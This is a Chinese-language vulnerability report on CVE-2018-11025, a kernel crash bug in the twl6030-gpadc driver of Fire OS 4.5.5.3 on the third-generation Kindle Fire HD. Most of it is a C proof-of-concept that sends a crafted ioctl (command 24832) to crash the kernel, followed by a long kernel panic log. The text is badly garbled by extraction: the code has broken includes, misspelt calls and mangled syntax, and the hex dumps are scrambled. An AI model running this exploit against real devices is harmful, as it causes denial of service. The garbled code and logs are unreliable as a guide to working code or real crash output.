（CVE-2018-11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversmfdtwl6030-gpadc.c 允许攻击者通过设备/ dev / tw16030 上的 ioctl的参数注入特制的参数-gpadc命令24832并导致内核崩溃。要探索此漏洞，必须打开设备文件devtwl6030-gpadc,并使用命令24832和 精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devtwl6030-gpadc cause s* the system crash via IOCTL 24832.* This Poc should run with permission to do ioctl on devtwl6030-gpad c.* */#include <stdio.h>#include <fcntl.h> #include <errno.h>include <sysioctl.h> const static char *driver = "devtwl6030-gpadc" static command = 24832;struct twl6030_gpadc_user_parms int channel;int status;unsigned short result;；int main(int argc, char *argvj char *env) struct twl6030_gpadc_user_parms payload;payload.channel = 0x9b2a9212;payload.status = 0x0;payload.result = 0x0;int fd = 0;fd = OPen(driver, O_RDWR);if (fd < 0) printf("Failed to open %s, with errno %dn”, driver, errno);system(',echo 1 > /data/IOCaItmplog");return -1;printf("Try ioctl device file '%s', with command 0×%× and paylo ad NULLn"j driver, command);printf("System will crash and reboot.n");if(ioctl(fdj command, &payload) < 0) printf("Allocation of structs failed, %dn”, errno);system("echo 2 > datalocaltmplog");return -1;close(fd);return 0;崩溃日志18460.321624 Unable to handle kernel paging request at virtual addres s 4b3f25fc 18460.330139 pgd = ca210000 18460.333251 4b3f25fc *pgd=0000000018460.337768 Internal error: Oops: 5 #1 PREEMPT SMP ARM18460.343810 Modules linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)18460.351440 CPU: 0 Tainted: GO (3.4.83-gd2afc0bae69 #D18460.358825PC is at twl6030_gpadc_ioct1+0x160/0x18018460.364379LR is at twl6030_gpadc_conversion+0x5c/0x48418460.370452pc : <c031b080>y Ir : <c031a950>psr: 6003001318460.370452sp : de94dd90 ip : 00000000 fp : de94df0418460.383422rl0: 00000000 r9 : dcccf608 r8 : bea875ec18460.389282 ecr7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea87518460.39669701r3 : fffffeb4 r2 : 4b3f2730 rl : de94dee8 r0 : 00000018460.404113 ment userFlags: ZCv IRQs on FIQs on Mode SVC_32 ISA ARM Seg18460.41204818460.418609Control: 10c5387d Table: 8a21004a DAC: 0000001518460.418609PC: 0×c031b000:18460.423583b000 e24bl01c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 el8120b3 e597300818460.434234 b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f018460.444885 b040 e24b0el7el7 e3a0200c ebfced7fe3a0100cebfcf5c4eafffff8ela00004e24bl18460.455444 b060 e3500000 eb4 e34f3fff e08121020afffff3eafffffle51b2170e24bl01ce30f318460.465972 b080 e512213416c eaffffdf c0acabbcel8120b3eaffffe303e0303c150b016c050b318460.476623 b0a0 ela0c00d0ec 03e00012 e89da800e92dd800e24cb004e59030e0e35300001590018460.487182 b0c0 ela0c00d00d e92dd800 e24cb004e92dd800e24cb004e59000fe89da800elac18460.497863 b0e0 e5d020e900d e92dd800 e24cb0045d030e8el820003e2000003e89da800elac18460.50854418460.508544 LR: 0×c031a8d0:18460.513519 a8d0 e89da87800a 03a00000 e89da878ela00004ebffff20e2000003e350000213e0018460.524078 a8f C09ba0c0 000 0a000114 e59f5454ela0c00de92ddff0e24cb004e24dd014e250918460.534759 a910 e595008c 0b6 e3510001 9a00000ae35000000a00010be2800004eb0elffeld9118460.545318 a930 e595308c08c e28a0004 eb0elf69e3e06015e59fl42ce5930000ebff4e6be595a18460.555999 a950 ela00006193 e5933038 e3530000e24bd028e89daff0e595a08c3a03f52e023a18460.566680 a970 13e0600f 010 e08c7008 la0000253e59a32c4e0818101e595c088e313018460.577331 a990 e35100000b6 e3540000 0a0000bc0a0000c4eld930b8e35300010a0000d7eld9418460.587890 a9b e3a0000e 001 0a0000dl eld920b6e3a01002e3a02090e5956088ebfff8bce354018460.59857118460.598571 SP: 0×de94ddl0:18460.603546 ddl0 00000000080 60030013 ffffffff0000000dde94dda010624dd3de94dd4cc031b18460.614196 dd30 de94dd7c370 00000001 de94dee8bea875ecde94df04de94dd48C06a5318C000818460.624877 dd50 4b3f2730000 bea875ec dcccf608fffffeb4bea875ec0000610000000000de94c18460.635528 dd70 00000000080 60030013 ffffffffde94df0400000000de94dd90C031a950c031b18460.646087 dd90 de94ddac 8fc 00000000 000000009b2a92120000000000000000000400000001f18460.656738 ddb0 C00795a02bc de94de0c de94ddd800000001de94ddd4de94ddc8C00795b4C007918460.667419 ddd0 C0070df8 8f4 60000013 00000001C00795acde94c0000000000100000004dd32f18460.678100 ddf0 0000000100000004dd32f8000000000000000000de94del0 C00723a0 C06a4818 18460.68862918460.688659 FP: 0xde94de84:18460.693725 de84 de94de90 ed4 de94dea8 c00723aC0207454C00bd9200000001c26fda80de94d18460.704284 dea4 000fffff 000 de94df14 0000000000000000ffffffff00000002000000010000018460.714935 dec4 000000019fc 00000000 00000000dcccf608cfa9bf00de94defcde94dee0C020818460.725616 dee4 00000000 f74 de94df08 C013604400000000d683fb4000000004d683fb40de94d18460.736328 df04 C031af2c 000 ddl88490 d8f925d8000000000000000000000000000000010000018460.746856 df24 de94df0c b40 00000004 de94c000de94c000bea87618bea875ec00006100d683f18460.757537 df44 00000000 b40 00000004 de94c000de94df6400000000bea875ec00006100d683f18460.768096 df64 00000000 000 00000000 00000400de94dfa4de94df78C01365e0C0135fc40000018460.77862518460.778625 Rl: 0xde94de68:18460.783721 de68 c2572140001 de94dedc de94de90de94debc0000000100000028000fffff0000018460.794403 de88 C0207454 ea8 C00723a0 000fffffC00bd9200000001ec26fda80de94ded4de94d18460.804962 dea8 00000000 fl4 00000000 00000001ffffffff000000020000000100000000de94d18460.815643 dec8 dcccf608000 00000000 00000000cfa9bf00de94defcde94dee0c02089fc0000018460.826202 dee8 00000000 f08 c0136044 c031af2cd683fb4000000004d683fb40de94df74de94d18460.836730 df08 00000000490 d8f925d8 de94dfc00000000000000000000000100000000ddl8818460.847381 df28 de94c000 004 de94c000 00000000bea87618bea875ec00006100d683fb400000018460.858032 df48 de94df64 004 de94c000 0000000000000000bea875ec00006100d683fb400000018460.86871318460.868713 R3: 0xfffffe34:18460.873687 fe34 * * *18460.884246 fe54 * * *18460.894805 fe74 * * *18460.905456 fe94 * * *18460.916137 feb4 * * *18460.926788 fed4 * * *fef4 * * * * * * * *18460.948028 ffl4 * * * * * * * *18460.95870918460.958709 R7: 0xde94bf80:18460.963684 bf80 de926680 5cc 00000013 00000000c00635cc00000013de84190cde926680c006318460.974365 bfa0 000000005d8 00000000 0000000000000000de94bff4de94bfb8C0068af4C006318460.985015 bfc0 de926680 fd0 00000000 de84190c000000000000000000000000de94bfd0de94b18460.995574 bfe C0068a64 a70 Id04e2fb ldfbe204C004cd6400000000de94bff8c004cd64c006818461.006225 C000 00000000000 00000015 cf9fca800000000200000000c2572140C0a0e8400000018461.016906 C020 00000000 b40 de94da7c de94d9c8de94c000c09ddc50C2572140c25717c0C161718461.027587 C040 C06a36e4000 01000000 00000000000000000000000000000000000000000000018461.038146 C060 00c5f4c0000 00000000 00000000 18461.04882818461.048828 R9: 0xdcccf588:5ebcc27f0000000000000000000000000000018461.053802 f588 dcccf588674 000200da C09dda58dcccf588000000000000000000000000c06bc18461.064483 f5a8 000000005bc dcccf5bc 0000000000000000dcccf5b0dcccf5b000000000dcccf18461.075134 f5c8 5ae3ed25000 00000000 00000000000000000000000000000000dcccf5e00000018461.085815 f5e8 00200000440 dccb2440 000000000000000000000000dcccf5f4dcccf5f4dccb218461.096343 f608 00052180000 C06b9600 ddla4800000000000000000000000000000000000000018461.107025 f628 dcccf6e0 d25 2bc5ac58 5ae3ed25dccb030000000C450000000100a0003b5ae3e18461.117675 f648 2bc5ac58000 00000000 000000005ae3ed252bc5ac5800000000000000000000018461.128234 f668 00000000000 00000000 dcccf684000000000000000000000000000000010000018461.138885 Process twl6030_gpadc_i (pid: 12849j stacl- 4c2f8)18461.146697 Stack: (0xde94dd90 to 0xde94e000)18461.151611 dd80:212 00000000 00000000c limit =de94ddac0×de99b2a918461.160827 dda: 00040000001 de94ddd4 de94ddc80001f8fc0000000000000000c00795a0000018461.170043 ddc0: C00795b4 5ac de94c000 00000001c00792bcde94de0cde94ddd8C0070df8C007918461.179138 dde0: 00000004 004 dd32f800 00000000dd32f8f46000001300000001000000010000018461.188354 de00: 00000000001 dd32e0d8 dd32f800de94d610C00723a0C06a4818000000040000018461.197570 de20: dd32e000 e40 c02ba53c c00723600000000ade94c000c26fda80de94de54de94d18461.206787 de40: dd32f800518 dd32e000 00000002dd32e000de94de74de94de58c02c3c88c02ba18461.215881 de60: 00000002 028 000fffff 00000001dd32fbbcc2572140de94debc000000010000018461.225097 de80: de94dedc a80 de94ded4 de94dea8de94de90C0207454C00bd9200000001ec26fd18461.234313 dea: C00723a0 001 00000000 de94dfl4000fffff00000000ffffffff000000020000018461.243408 dec0: 00000000 ee0 c02089fc 0000000000000001dcccf608cfa9bf00de94defcde94d18461.252624 dee0: 00000000b40 de94df74 de94df080000000000000000d683fb4000000004d683f18461.261840 df00: C0136044 001 00000000 ddl88490c031af2c0000000000000000000000000000018461.271057 df20: d8f925d8100 d683fb40 00000004de94df0cde94c000bea87618bea875ec0000618461.280151 df40: de94c000100 d683fb40 0000000400000000de94df6400000000bea875ec0000618461.289367 df60: de94c000 fc4 00000000 0000000000000000de94dfa4de94df78C01365e0C013518461.298583 df80: 00000400 e08 00000000 de94dfa8bea8761800010e5c0000000000000036C001318461.307800 dfa0: C0013c60100 bea875ec bea875ecC0136578bea8761800010e5c000000040000618461.316894 dfc0: bea87618000 00000000 ba8760400010e5c0000000000000036000000000000018461.326110 dfe0: 00000000bea875d4000106980002918c6000001000000004 00000000 0000000018461.335296 Backtrace:18461.338317 <c031af20> (twl6030_gpadc_ioctl+0x0/0xl80) from <C0136044> (do_vfs_ioctl+0x8c/0x5b4)r6:00000004 r5:d683fb40 r4:00000000 (do_vfs_ioctl+0x0/0x5b4) from <c01365e>18461. 348571 r7:d683fb40 18461.355560 <c0135fb8> (sys_ioctl+0x74/0x84)(sys-ioctl+0×00×84) from <c0013c60> (ret18461.364807 <c013656c> _fast_syscall+0x0/0x30)18461.374206761818461.38250718461.40106118461.40106118461.40109218461.40109218461.40109218461.40112218461.401122r8:c0013e08r7:00000036 r6:00000000 r5:00010e5c r4:bea8Code: e24bl01c 30f3eb4 e34f3fff e0812102 (e5122134)Board Information:Revision : 0001Serial : 0000000000000000SoC Information:CPU Rev Type：OMAP4470：ES1.0：HS18461.40112218461.40112218461.40115318461.40612718461.406127Production ID: 0002B975-000000CCDie ID ： 1CC60000-50002FFF-0B00935D-11007004 audit_printk_skb: 111 callbacks suppressed type=1400 audit(1525657115.783:1097): avc: denied ge tattr for pid=12851 comm="am" path="/system/bin/app_process" dev=',mm cblk0p9" ino=32006 scontext=u:r:untrusted_app:s tcontext=u:object_r:zy gote_exec:s0 tclass=file18461.406280 type=1400 audit(1525657115.783:1098): avc: denied ex ecute for pid=12851 comm="am" name="app_process" dev="mmcblkp9" ino =32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file 18461.406524 type=1400 audit(1525657115.783:1099): avc: denied re ad open for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" i no=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec: s tclass=file 18461.406768 type=1400 audit(1525657115.783:1100): avc: denied ex ecute_no_trans for pid=12851 comm="am" path="/system/bin/app_process "dev=,mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:ob ject_r:zygote_exec:s0 tclass=file 18461.534057 - end trace f98f4a7b98572f61 -18461.540374 Kernel panic - not syncing: Fatal exception18461.549285 Backtrace:18461.552459 <C0018148> (dump-stack+0×180xlc)184617s61828r6:c09ddc5018461.568969 <c0698ba> ndle_IPI+0xl90/0xlc4)18461.578185 <c0019a48> ic_handle_irq+0x58/0x60)18461.546173 CPUl: stopping (dump_backtrace+0x0/0xl0c) from <c0698bb8>r5:c09dc844 r4:00000001 r3:c0a0e950(dump_stack+0x0/0xlc) from <c0019bd8> (ha(handle_IPI+0x0/0xlc4) from <c00084fc> (g(gic_handle_irq+0x0/0x60) from <c06a5540>18461.587554 <c00084a4>(_i rq_u s r+0×400×60) 18461.596862 Exception Stack(0xc8967fb0 to 0×c8967ff8)18461.602691 7fa0:404143ed 4041294b 00000054 000012f0 18461.611755 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040dl48 40411 ld8 beb9c2e0 404275c018461.620971 7fe0: 40416bef beb9clf0 4009d01f 400a0ec0 000f0010 fffff fff18461.628478 r6r5:000f0010 r4:400a0ec0 r3:404143ed18461.635559 CPU0 PC (0)0×c003ee3818461.639617 CPU0 PC (1)0xc003ee5418461.643798 CPU0 PC (2)0xc003ee5418461.647857 CP0 PC (3)0xc003ee5418461.651916 CP0 PC (4)0xc003ee5418461.656097 CPU0 PC (5)0xc003ee5418461.660156 CPU0 PC (6)0×c003ee5418461.664215 CPU0 PC (7)0×c003ee5418461.668395 CPU0 PC (8)0×c003ee5418461.672454 CPU0 PC (9)0xc003ee5418461.676513 CPUl PC (0)0xc0019b2c18461.680694 CPUl PC (1)0xc0019b2c18461.684753 CPUl PC (2)0xc0019b2c18461.688812 CPUl PC (3)0×c0019b2c18461.692871 CPUl PC (4)0×c0019b2c18461.697051 CPUl PC (5)0×c0019b2c18461.701110 CPUl PC (6)0×c0019b2c18461.705169 CPUl PC (7)0xc0019b2c18461.709381 CPUl PC (8)0xc0019b2c18461.713409 CPUl PC (9)